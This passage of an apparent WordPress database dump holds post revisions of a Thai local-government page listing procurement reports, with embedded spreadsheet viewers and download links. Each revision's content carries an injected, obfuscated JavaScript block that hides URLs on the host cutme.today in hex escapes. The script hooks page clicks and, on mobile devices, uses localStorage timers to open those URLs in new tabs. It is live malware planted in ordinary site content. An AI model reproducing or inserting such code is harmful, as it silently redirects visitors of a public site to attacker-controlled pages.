\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ','','inherit','closed','closed','','840-revision-v1','','','2024-08-15 11:34:03','2024-08-15 04:34:03','',840,'http://pakhaeng.ssk.in.th/?p=849',0,'revision','',0),
(850,1,'2024-08-15 11:34:54','2024-08-15 04:34:54','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21142&authkey=!AKgnNha0_TYdbgU&em=2\" width=\"1500\" height=\"500\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:file {\"id\":843,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\">รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ','','inherit','closed','closed','','840-revision-v1','','','2024-08-15 11:34:54','2024-08-15 04:34:54','',840,'http://pakhaeng.ssk.in.th/?p=850',0,'revision','',0),
(851,1,'2024-08-15 11:43:23','2024-08-15 04:43:23','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21143&authkey=!AAbw2pzEYUYQUVQ&em=2\" width=\"1500\" height=\"500\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:file {\"id\":852,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o16ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-281035fb-58c2-4d1a-a58d-c0677415c304\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o16ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o16ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-281035fb-58c2-4d1a-a58d-c0677415c304\">Download</a></div>\n<!-- /wp:file --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 